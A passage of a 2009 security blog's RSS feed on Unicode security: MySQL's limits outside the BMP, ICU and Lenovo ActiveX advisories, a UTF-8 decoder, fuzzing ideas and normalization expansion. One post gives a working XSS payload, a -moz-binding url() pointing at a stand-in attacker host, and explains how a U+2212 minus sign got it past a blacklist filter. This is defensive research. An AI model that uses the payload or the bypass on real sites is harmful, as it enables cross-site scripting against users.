+0000</pubDate><atom:updated>2012-01-16T17:15:44.920-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Major applications fail to include full Unicode support</title><description>As I’ve found with most of the major Web-apps out there, including social media giants like Facebook and others, Unicode support is far from complete. I’m not a big MySQL guy, but have been building some stuff lately and ran into this:&lt;br/&gt;&lt;br/&gt;&lt;a href="http://dev.mysql.com/doc/refman/6.0/en/faqs-cjk.html#qandaitem-22-11-1-16"&gt;http://dev.mysql.com/doc/refman/6.0/en/faqs-cjk.html#qandaitem-22-11-1-16&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;Basicall MySQL version &amp;lt; 6.0.4 doesn’t support characters outside the BMP (Basic Multilingual Plane) which seems to be a common pattern for a lot of software. The BMP is all code points 0×0000 to 0xFFFF, however, Unicode stretches far beyond to 0×10FFFF. It makes sense I suppose, after all the BMP is made of the most commonly used scripts, the stuff beyond it (supplementary) are usually considered rare.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-8523189811117200236?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/05/major-applications-fail-to-include-full.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5193395518262590003</guid><pubDate>Fri, 15 May 2009 21:18:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.791-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>ICU</category><title>Advisory: International Components for Unicode CVE-2009-0153</title><description>Big ones from Apple today: &lt;a href="http://support.apple.com/kb/HT3549"&gt;http://support.apple.com/kb/HT3549&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;CVE-ID: CVE-2009-0153&lt;br/&gt;&lt;br/&gt;Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6&lt;br/&gt;&lt;br/&gt;Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting&lt;br/&gt;&lt;br/&gt;Description: An implementation issue exists in ICU’s handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. This issue does not affect systems prior to Mac OS X v10.5. Credit to Chris Weber of Casaba Security for reporting this issue.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5193395518262590003?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/05/advisory-international-components-for.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-4836823575027994099</guid><pubDate>Thu, 07 May 2009 21:15:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.786-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>best-fit</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Unicode security attacks and test cases – Best-fit mappings and String
transformations</title><description>Best-fit mappings are another complex topic in Unicode, easily overlooked or misunderstood.  On the defensive side, if you can only remember two things:&lt;br/&gt;&lt;ol&gt;&lt;br/&gt;	&lt;li&gt;Converting      &lt;strong&gt;to Unicode is      safe&lt;/strong&gt;.&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Converting      &lt;strong&gt;between legacy      character sets is dangerous&lt;/strong&gt;.&lt;/li&gt;&lt;br/&gt;&lt;/ol&gt;&lt;br/&gt;Ah forget it, unfortunately it’s more complicated than that, because &lt;a href="http://www.lookout.net/2008/04/21/string-handling-when-marshalling-from-net-to-a-platform-invoke/"&gt;basic string handling&lt;/a&gt; can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.&lt;br/&gt;&lt;br/&gt;The term &lt;strong&gt;best-fit mapping&lt;/strong&gt; describes the concept of how a character should be represented when it doesn’t have an explicit place in a destination character set.&lt;br/&gt;&lt;br/&gt;I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They just implemented a new profile editor complete with user-ccontrolled CSS. They were smart though, they actually knew that stuff like this would lead to XSS:&lt;br/&gt;&lt;br/&gt;&lt;code&gt;−moz−binding: url(&lt;a href="http://nottrusted.com/gotcha.xml#xss"&gt;http://nottrusted.com/gotcha.xml#xss&lt;/a&gt;)&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;So they implemented some sort of blacklist because well that’s common. Anyway, somewhere in the callstack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out I could manipulate the input with a character that would pass through their filter, and come out transformed into the character I needed. The input:&lt;br/&gt;&lt;br/&gt;&lt;code&gt;−moz−binding: url(&lt;a href="http://nottrusted.com/gotcha.xml#xss"&gt;http://nottrusted.com/gotcha.xml#xss&lt;/a&gt;)&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;The first character here is U+2212, the MINUS SIGN (−) which was being transformed through an apparent best-fit mapping into U+002D, or -.&lt;br/&gt;&lt;br/&gt;The &lt;a href="http://websecuritytool.codeplex.com/"&gt;Watcher security testing tool&lt;/a&gt; I released a few months ago has a new check coming to detect string transformations like this. My plan was to detect spots where strings can be manipulated to pull off attacks like I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-4836823575027994099?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/05/unicode-security-attacks-and-test-cases.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>3</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-6684314918597917975</guid><pubDate>Fri, 24 Apr 2009 21:14:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.842-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>UTF8</category><category domain='http://www.blogger.com/atom/ns#'>encodings</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Ultrafast UTF-8 decoder by Bjoern Hoehrmann</title><description>I believe this is still getting tested by several parties, but it’s obviously a highly optimized implementation of a UTF-8 decoder. Bjoern Hoehrmann released his &lt;a href="http://bjoern.hoehrmann.de/utf-8/decoder/dfa/"&gt;Flexible and Economical UTF-8 Decoder &lt;/a&gt;recently, check it out:&lt;br/&gt;&lt;code&gt;// Copyright (c) 2008-2009 Bjoern Hoehrmann &lt;/code&gt;&lt;br/&gt;&lt;code&gt;// See &lt;a href="http://bjoern.hoehrmann.de/utf-8/decoder/dfa/"&gt;http://bjoern.hoehrmann.de/utf-8/decoder/dfa/&lt;/a&gt; for details.&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;#define UTF8_ACCEPT 0&lt;br/&gt;#define UTF8_REJECT 1&lt;br/&gt;&lt;br/&gt;static const uint8_t utf8d[] = {&lt;br/&gt;0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 00..1f&lt;br/&gt;0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 20..3f&lt;br/&gt;0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 40..5f&lt;br/&gt;0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 60..7f&lt;br/&gt;1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9, // 80..9f&lt;br/&gt;7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7, // a0..bf&lt;br/&gt;8,8,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2, // c0..df&lt;br/&gt;0xa,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x4,0x3,0x3, // e0..ef&lt;br/&gt;0xb,0x6,0x6,0x6,0x5,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8, // f0..ff&lt;br/&gt;0x0,0x1,0x2,0x3,0x5,0x8,0x7,0x1,0x1,0x1,0x4,0x6,0x1,0x1,0x1,0x1, // s0..s0&lt;br/&gt;1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1, // s1..s2&lt;br/&gt;1,2,1,1,1,1,1,2,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1, // s3..s4&lt;br/&gt;1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,3,1,3,1,1,1,1,1,1, // s5..s6&lt;br/&gt;1,3,1,1,1,1,1,3,1,3,1,1,1,1,1,1,1,3,1,1,1,1,1,1,1,1,1,1,1,1,1,1, // s7..s8&lt;br/&gt;};&lt;br/&gt;&lt;br/&gt;uint32_t inline&lt;br/&gt;decode(uint32_t* state, uint32_t* codep, uint32_t byte) {&lt;br/&gt;uint32_t type = utf8d[byte];&lt;br/&gt;&lt;br/&gt;*codep = (*state != UTF8_ACCEPT) ?&lt;br/&gt;(byte &amp;amp; 0x3fu) | (*codep &amp;lt;&amp;lt; 6) :&lt;br/&gt;(0xff &amp;gt;&amp;gt; type) &amp;amp; (byte);&lt;br/&gt;&lt;br/&gt;*state = utf8d[256 + *state*16 + type];&lt;br/&gt;return *state;&lt;br/&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-6684314918597917975?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/04/ultrafast-utf-8-decoder-by-bjoern.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5708736620417905160</guid><pubDate>Thu, 23 Apr 2009 21:05:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.817-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>test cases</category><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>fuzzing</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Unicode security attacks and test cases – fuzzing with Unicode</title><description>When it comes to fuzzing parsers, protocols, and other software, I want the fuzzer to be capable of producing tests specific to Unicode. Here’s what it should do at a minimum:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;Generate      half a surrogate pair in UTF-8 or UTF-16&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Generate      illformed byte sequences for UTF-8 and UTF-16&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Generate      overlong UTF-8&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Generate      unassigned and reserved code points&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Generate      codepoints outside of the valid range&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Generate      interesting control characters and characters with special meaning like      the BOM, embedding, overrides, etc.&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;I’ve got some code that does most of these things. Maybe I should elaborate on them some more… Does Peach or another fuzzing framework provide this already?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5708736620417905160?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/04/unicode-security-attacks-and-test-cases_23.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-1223659476986565569</guid><pubDate>Fri, 03 Apr 2009 21:03:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.601-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>software</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>test cases</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><category domain='http://www.blogger.com/atom/ns#'>normalization</category><title>Unicode security attacks and test cases – Normalization expansion for
buffer overflows</title><description>Normalization, like casing operations, can cause changes to the number of characters and bytes in a string. In testing software, I want to know how to get the most bang for my buck – in other words, what’s the minimal input I can provide to cause the maximum character and byte exansion?&lt;br/&gt;&lt;br/&gt;First step:  Figure out what normalization operation your input is going through – NFC, NFD, NFCD, or NFKD.&lt;br/&gt;&lt;br/&gt;Next step: Find the right input.&lt;br/&gt;&lt;br/&gt;For example, if I pass in a character like U+2177 SMALL ROMAN NUMERAL EIGHT (ⅷ), I’ve passed in a single ‘character’ that takes three bytes [E2, 85, B7] to encode in UTF-8. If that character passes through a decomposed normalization form like NFKC or NFKD, then it has a compatibility mapping from one code point to four: U+0076 U+0069 U+0069 U+0069. Now those are all ASCII characters, so bytewise I didn’t really expand all that much, just one byte, but three extra characters.&lt;br/&gt;&lt;br/&gt;Well there may be better cases than this one, just take a look at the maximum expansion factor table, courtesy of the &lt;a href="http://unicode.org/faq/normalization.html#12"&gt;Unicode Normalization FAQ&lt;/a&gt;:&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-1223659476986565569?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/04/unicode-security-attacks-and-test-cases.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-8711529186238032083</guid><pubDate>Fri, 27 Mar 2009 21:01:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.928-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>ActiveX</category><title>Advisory: Lenovo/IBM ActiveX buffer overflow</title><description>CERT released the advisory for this, which I believe is not being fixed by Lenovo/IBM.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.kb.cert.org/vuls/id/340420"&gt;http://www.kb.cert.org/vuls/id/340420&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;This ActiveX control comes preinstalled on many Lenovo systems, and is also downloaded from the main page of their support site. It’s a nasty stack-based buffer overflow, and enterprises and other consumers should consider how to workaround this.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-8711529186238032083?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/03/advisory-lenovoibm-activex-buffer.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item></channel></rss>
